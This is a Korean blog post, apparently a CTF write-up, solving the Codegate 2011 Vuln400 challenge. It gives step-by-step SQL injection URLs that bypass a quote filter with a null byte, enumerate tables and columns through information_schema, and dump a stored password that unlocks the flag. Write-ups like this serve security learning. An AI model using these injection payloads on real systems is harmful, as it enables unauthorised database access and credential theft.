본문 바로가기

컴터 때찌/CTF

[Codegate 2011] Vuln400



쓰기 기능과 검색 기능이 있고  Read me if you can 글이 있는 게시판 공략



Read me if you can을 읽으려하면 비밀번호가 필요함


쓰기 기능이 있는 곳 jpg만 업로드 가능함


검색 search 부분에 쿼터 스트링 사용 금지 라는 메시지가 뜸

This means that they are searching for the single quote character in the query

variable. (PPP 보고서 中)


널바이트를 넣고 쿼터를 쓰면 잘됨


http://221.141.3.111/__board/board.php?order=subject&search=%00' union select 'a','b','c','d','e','f','g','h','i','j','k'%23

c가 제목 부분이란걸 알수 있음,


http://221.141.3.111/__board/board.php?order=subject&search=%00' union select 'a','b',(select group_concat(table_name) from information_schema.tables),'d','e','f','g','h','i','j','k' %23

sonic_board 라는 테이블이 보인다


http://221.141.3.111/__board/board.php?order=subject&search=%00' union select 'a','b',(select group_concat(column_name) from information_schema.columns where table_name='sonic_board'),'d','e','f','g','h','i','j','k' %23

 pass 라는 컬럼이 보인다


http://221.141.3.111/__board/board.php?order=subject&search=%00' union select 'a','b',(select pass from sonic_board limit 0,1),'d','e','f','g','h','i','j','k' %23

pass 컬럼에는 sonic!%#$**()%#_?qwerasdfzxcv{} 가 있다


Read me if you can의 비밀번호로 sonic!%#$**()%#_?qwerasdfzxcv{}를 넣음

Password is : HackingForCola 



'컴터 때찌 > CTF' 카테고리의 다른 글

[wowhacker] 7번(AuThWithMySQL)  (0) 2011.04.29
pCTF[14] Sha1 is fun  (0) 2011.04.26
[Codegate 2011] Vuln200  (0) 2011.03.10
[Codegate 2011] Vuln100  (0) 2011.03.10
Padocon 2011 WTF400(Doc)  (0) 2011.01.21